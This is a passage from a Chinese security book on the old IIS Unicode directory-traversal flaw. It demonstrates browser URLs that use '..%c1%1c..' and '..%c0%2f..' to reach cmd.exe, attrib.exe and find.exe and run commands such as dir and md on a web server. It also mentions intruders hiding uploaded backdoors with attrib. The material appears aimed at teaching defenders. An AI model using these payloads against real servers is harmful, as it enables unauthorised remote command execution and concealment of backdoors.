黑客攻防技术内幕-防止入侵的方法(13)

6. 显示某一路径下相同文件类型的文件

如果要显示d盘Inetpub\scripts\wwwroot下的相同文件类型，可在浏览器的地址栏中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.ht*

如图6-71所示。

图6-71  显示d盘Inetpub\scripts\wwwroot下的相同文件类型

7. attrib命令

显示或更改文件属性的命令。该命令显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。入侵者有时会上传一些后门程序，并用该命令将其隐藏起来。具体参数如表6-1所示。

   表6-1  attrib参数

这里的%2b相当于DOS下的+b，例如要查看d盘Inetpub\scripts\wwwroot下的index.htm的属性，可在浏览器的地址栏中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/attrib.exe?d:\inetpub\wwwroot\index.htm

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/attrib.exe?d:\inetpub\wwwroot\index.htm

如图6-72所示。

图6-72  查看index.htm的属性

可以从图6-72看出index.htm文件属于只读、隐藏、存档。

8. md命令

创建目录或子目录。如果要向d盘下建立一个名为file的文件夹，可在浏览器的地址栏中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+md d:\file

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+md d:\file

如图6-73和6-74所示。

图6-73  使用md命令建立文件夹

图6-74  利用UNICODE漏洞建立文件夹file

遇到空格用%20代替，遇到长度超过8个字母的文件或是Program Files这一类文件时，将使用以下格式：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\progra~1 

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\progra~1 

如图6-75所示。

图6-75  查看Program Files文件夹

9. echo命令

回显命令。在DOS模式下输入echo/?，如图6-76所示。

图6-76  echo命令

echo回显命令在系统默认下是打开的，如果输入参数off则关闭回显命令。在echo命令后面跟上一个字符，则该字符被回显，如图6-77所示。

图6-77  echo命令的使用

10. 管道工具的使用

管道工具>、>>的功能是将命令产生的输出重新定向，例如，写到某个文件或输出到打印机中。>>产生的内容将追加进文件中，>则将原文件内容覆盖。在D盘下将dir命令列出的目录，输出到D盘文件ffhh.txt中，如图6-78和图6-79所示。

这时系统的D盘下会有个名为ffhh.txt的文件，打开后显示着D盘下用dir列出的目录，如图6-81所示。

图6-78  将D盘目录输出到ffhh.txt中       图6-79  通过管道命令将D盘目录写入记事本

还有很多命令可以使用，如删除目录的rd命令、复制文件和目录的xcopy命令、文件夹剪贴命令move等。

6.9.2小节介绍一个入侵者是如果利用UNICODE漏洞对网站进行攻击的。